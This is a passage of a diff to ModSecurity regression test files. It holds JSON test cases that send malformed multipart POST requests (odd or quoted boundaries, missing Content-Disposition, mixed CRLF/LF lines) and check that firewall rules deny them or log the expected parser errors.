"User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=0000 ", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403 + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (boundary special char - trailing whitespace+token)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data;boundary=0000 1111", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r\n", + "Content-Disposition: form-data; name=\"name\"\r\n", + "\r\n", + "Brian Rectanus\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"email\"\r\n", + "\r\n", + "brian.rectanus@breach.com\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r\n", + "Content-Type: image/jpeg\r\n", + "\r\n", + "BINARYDATA\r\n", + "--0000--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "No boundaries found in payload" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (boundary special char - trailing exclamation+token)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data;boundary=0000!1111", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "Invalid boundary in C-T \\(characters\\)" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (quoted boundary - normal)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data;boundary=\"0000\"", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "boundary was quoted" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (quoted boundary value - whitespace before)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data;boundary=\" 0000\"", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "boundary was quoted.*No boundaries found in payload" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (quoted boundary value - whitespace after)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data;boundary=\"0000 \"", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted." + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (quoted boundary value - whitespace after)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data;boundary=\"0000 \"", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted." + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (quoted boundary value - whitespace between)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data;boundary=\"0000 1111\"", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "boundary was quoted" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (quoted boundary value - contained quote)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data;boundary=\"00\"00\"", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--00\"00\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--00\"00\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--00\"00\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--00\"00--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "Invalid boundary in C-T \\(characters\\)" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (quoted boundary value - two quoted values)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data;boundary=\"00\"\"00\"", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--00\"00\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--00\"00\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--00\"00\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--00\"00--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "Invalid boundary in C-T \\(characters\\)" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (partial quoted boundary value - only start quote)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data;boundary=\"0000", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "Invalid boundary in C-T \\(quote\\)" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (partial quoted boundary value - only end quote)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data;boundary=0000\"", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "Invalid boundary in C-T \\(quote\\)" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (multipart mixed - normal)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=0000", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r\n", + "Content-Disposition: form-data; name=\"name\"\r\n", + "\r\n", + "Brian Rectanus\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"email\"\r\n", + "\r\n", + "brian.rectanus@breach.com\r\n", + "--0000\r\n", + "Content-Disposition: attachment\r\n", + "Content-Type: multipart/mixed; boundary=BbC04y\r\n", + "\r\n", + "--BbC04y\r\n", + "Content-Disposition: file; filename=\"file1.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "... contents of file1.txt ...\r\n", + "--BbC04y\r\n", + "Content-Disposition: file; filename=\"file2.gif\r\n", + "Content-Type: image/jpeg\r\n", + "Content-Transfer-Encoding: binary\r\n", + "\r\n", + "...contents of file2.gif...\r\n", + "--0000--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "Invalid Content-Disposition header" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (multipart mixed - missing disposition)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=0000", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r\n", + "Content-Disposition: form-data; name=\"name\"\r\n", + "\r\n", + "Brian Rectanus\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"email\"\r\n", + "\r\n", + "brian.rectanus@breach.com\r\n", + "--0000\r\n", + "Content-Type: multipart/mixed; boundary=BbC04y\r\n", + "\r\n", + "--BbC04y\r\n", + "Content-Disposition: file; filename=\"file1.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "... contents of file1.txt ...\r\n", + "--BbC04y\r\n", + "Content-Disposition: file; filename=\"file2.gif\r\n", + "Content-Type: image/jpeg\r\n", + "Content-Transfer-Encoding: binary\r\n", + "\r\n", + "...contents of file2.gif...\r\n", + "--0000--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "Part missing Content-Disposition header" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (normal)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=0000", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r\n", + "Content-Disposition: form-data; name=\"name\"\r\n", + "\r\n", + "Brian Rectanus\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"email\"\r\n", + "\r\n", + "brian.rectanus@breach.com\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"image1\"; filename=\"image1.jpg\"\r\n", + "Content-Type: image/jpeg\r\n", + "\r\n", + "BINARYDATA1\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"image2\"; filename=\"image2.jpg\"\r\n", + "Content-Type: image/jpeg\r\n", + "\r\n", + "BINARYDATA2\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"image3\"; filename=\"image3.jpg\"\r\n", + "Content-Type: image/jpeg\r\n", + "\r\n", + "BINARYDATA3\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"test\"\r\n", + "\r\n", + "This is test data.\r\n", + "--0000--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "Upload file limit exceeded" + }, + "rules":[ + "SecRuleEngine On", + "SecUploadKeepFiles On", + "SecUploadDir /tmp", + "SecUploadFileLimit 2", + "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500161\"", + "SecRule MULTIPART_FILE_LIMIT_EXCEEDED \"!@eq 1\" \"phase:2,deny,id:500162\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500163\"", + "SecRule &FILES \"!@eq 3\" \"phase:2,deny,id:500164\"", + "SecRule &FILES_NAMES \"!@eq 3\" \"phase:2,deny,id:500165\"", + "SecRule &FILES_SIZES \"!@eq 3\" \"phase:2,deny,id:500166\"", + "SecRule FILES_SIZES:/^image/ \"@eq 0\" \"phase:2,deny,id:500167\"", + "SecRule &FILES_TMPNAMES \"!@eq 2\" \"phase:2,deny,id:500168\"" + ] }, { "enabled":1, diff --git a/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json b/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json index 95e8bd4eb9..3d23407596 100644 --- a/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json +++ b/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json @@ -1,121 +1,121 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: FILES (1/1)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"name\"\n", - "\n", - "test\n", - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", - "Content-Type: text/plain\n", - "\n", - "This is a very small test file..\n", - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", - "Content-Type: text/plain\n", - "\n", - "This is another very small test file..\n", - "----------------------------756b6d74fa1a8ee2--\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Target value: \"0\" \\(Variable: MULTIPART_CRLF_LF_LINES\\)" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_CRLF_LF_LINES \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: FILES (1/1)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"name\"\n", - "\n", - "test\n", - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", - "Content-Type: text/plain\n", - "\n", - "This is a very small test file..\n", - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\r\n", - "Content-Type: text/plain\r\n", - "\r\n", - "This is another very small test file..\r\n", - "----------------------------756b6d74fa1a8ee2--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Target value: \"1\" \\(Variable: MULTIPART_CRLF_LF_LINES\\)" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_CRLF_LF_LINES \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" - ] - } -] - +[ + { + "enabled":1, + "version_min":300000, + "title":"Testing Variables :: FILES (1/1)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Target value: \"0\" \\(Variable: MULTIPART_CRLF_LF_LINES\\)" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_CRLF_LF_LINES \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"Testing Variables :: FILES (1/1)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: 